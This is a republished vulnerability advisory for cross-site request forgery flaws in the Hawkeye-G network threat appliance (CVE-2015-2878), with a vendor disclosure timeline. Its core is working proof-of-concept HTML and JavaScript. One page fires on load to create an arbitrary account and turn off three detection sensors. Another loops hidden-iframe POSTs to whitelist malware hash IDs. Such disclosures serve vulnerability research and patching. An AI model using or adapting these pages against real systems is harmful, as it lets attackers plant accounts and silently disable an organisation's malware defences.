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Hawkeye-G 3.0.1.4912 - Cross-Site Request Forgery

Hawkeye-G 3.0.1.4912 - Cross-Site Request Forgery

Publié le 2015-07-24

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# Exploit Title:  CSRF, Network Threat Appliance IDS / IPS

# Google Dork: intitle: CSRF Network Threat Appliance IDS / IPS

# Date: 2015-07-24

# Exploit Author:  John Page ( hyp3rlinx )

# Website: hyp3rlinx.altervista.org

# Vendor Homepage: www.hexiscyber.com

# Software Link:  www.hexiscyber.com/products/hawkeye-g

# Version:  v3.0.1.4912

# Tested on: windows 7 SP1

# Category: Network Threat Appliance IDS / IPS







Vulnerability Type:

===================

CSRF





CVE Reference:

==============

CVE-2015-2878







Vendor:

===================

www.hexiscyber.com







Product:

=====================================================================

Hawkeye-G v3.0.1.4912



Hawkeye G is an active defense disruptive technology that detects,

investigates, remediates and removes cyber threats within the network.







Advisory Information:

====================================================



Multiple CSRF(s) Vulnerabilities:





Vulnerability Details:

=====================



1- CSRF Add arbitrary accounts to system

------------------------------------



vulnerable URL:

https://localhost:8443/interface/rest/accounts/json



vulnerable POST parameter:

'name'





2- CSRF modification of network sensor settings

---------------------------------------------------------------------



a) Turn off 'Url matching' Sensor

b) Turn off 'DNS Inject' Sensor

c) Turn off 'IP Redirect' Sensor



vulnerable URL:

https://localhost:8443/interface/rest/dpi/setEnabled/1



vulnerable POST parameters:

'url_match'

'dns_inject'

'ip_redirect'



3- CSRF whitelisting of malware MD5 hash IDs

------------------------------------------------------



vulnerable URL:

https://localhost:8443/interface/rest/md5-threats/whitelist



vulnerable POST parameter 'id'







CSRF Exploit code(s):

====================





<!DOCTYPE>

<html>



<script>



/* Execute consecutive CSRF exploits */



function ghostofsin(){

 var doc=document;

 var e1=doc.getElementById('exploit_1')

 e1.submit()

 var e2=doc.getElementById('exploit_2')

  e2.submit()

 var e3=doc.getElementById('exploit_3')

  e3.submit()

 var e4=doc.getElementById('exploit_4')

  e4.submit()

}

</script>



<body onLoad="ghostofsin()">



<!-- Add arbitrary accounts -->

<form id="exploit_1" action="

https://localhost:8443/interface/rest/accounts/json" method="post">

<input type="text" name="human" value="true" />

<input type="text" name="name" value="inverted_crosses" />

<input type="text" name="domainId" value=""/>

<input type="text" name="domain_id" value="" />

<input type="text" name="roving" value="false" />

</form>





<!-- shutdown the 'Url Matching' Sensor that

is responsible for detecting known malware domains -->



<form id="exploit_2" action="

https://localhost:8443/interface/rest/dpi/setEnabled/1" method="post">

<input type="text" name="level" value="1" />

<input type="text" name="enable" value="false" />

<input type="text" name="attribute" value="url_match"/>

</form>



<!-- set the DNS Inject Network Sensor to off -->



<form id="exploit_3" action="

https://localhost:8443/interface/rest/dpi/setEnabled/1" method="post">

<input type="text" name="level" value="1" />

<input type="text" name="enable" value="false" />

<input type="text" name="attribute" value="dns_inject"/>

</form>



<!-- set the IP Redirect Network Sensor to off -->



<form id="exploit_4" action="

https://localhost:8443/interface/rest/dpi/setEnabled/1" method="post">

<input type="text" name="level" value="1" />

<input type="text" name="enable" value="false" />

<input type="text" name="attribute" value="ip_redirect"/>

</form>



</body>

</html>





Whitelist MD5 malware IDs CSRF:

-------------------------------



In final CSRF POC to try an white list malware MD5 IDs will be a bit more

complex,

we need to submit form many times hidden in background using iframe so we

stay on same page.

Seems all MD5 ID's end in 0001 and are 8 bytes in length, we just need a

loop an create some

numbers 8 bytes long and dynamically assign the 'id' value of the field and

execute multiple

POST requests in background, it will be hit or miss unless you know ahead

of time the MD5 ID

in the database your targeting.



e.g. Malware MD5 database ID 28240001



So Here we go!...



<!-- whitelist MD5 malware IDs -->



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"

"http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title>CSRF POC hyp3rlinx</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

</head>

<body>

<form id="hell" action="

https://localhost:8443/interface/rest/md5-threats/whitelist"

target="demonica" method="post">

<input type="hidden" name="id" id="id"><br>

</form>

<IFRAME style="display:none" name="demonica"></IFRAME>

<script>

var doc=document

var x=1000

exorcism()

function exorcism(){

 x++

 String(x)

 x+="0001"

 var f=doc.getElementById('hell')

 var e=doc.getElementById('id')

 e.value=x

  x=x.substr(0,4)

 f.submit()

 }

 setInterval("exorcism()",100)

</script>

</body>

</html>







Disclosure Timeline:

=========================================================

Vendor Notification: June 30, 2015

July 24, 2015 : Public Disclosure







Severity Level:

=========================================================

High







Description:

==========================================================



Request Method(s):              [+] POST





Vulnerable Product:             [+] Hawkeye-G v3.0.1.4912





Vulnerable Parameter(s):        [+] name, enable, id





Affected Area(s):               [+] Network Threat Appliance, Local Domain





============================================================================



[+] Disclaimer

Permission is hereby granted for the redistribution of this advisory,

provided that it is not altered except by reformatting it, and that due

credit is given. Permission is explicitly given for insertion in

vulnerability databases and similar, provided that due credit is given to

the author.

The author is not responsible for any misuse of the information contained

herein and prohibits any malicious use of all security related information

or exploits by the author or elsewhere.





(hyp3rlinx)

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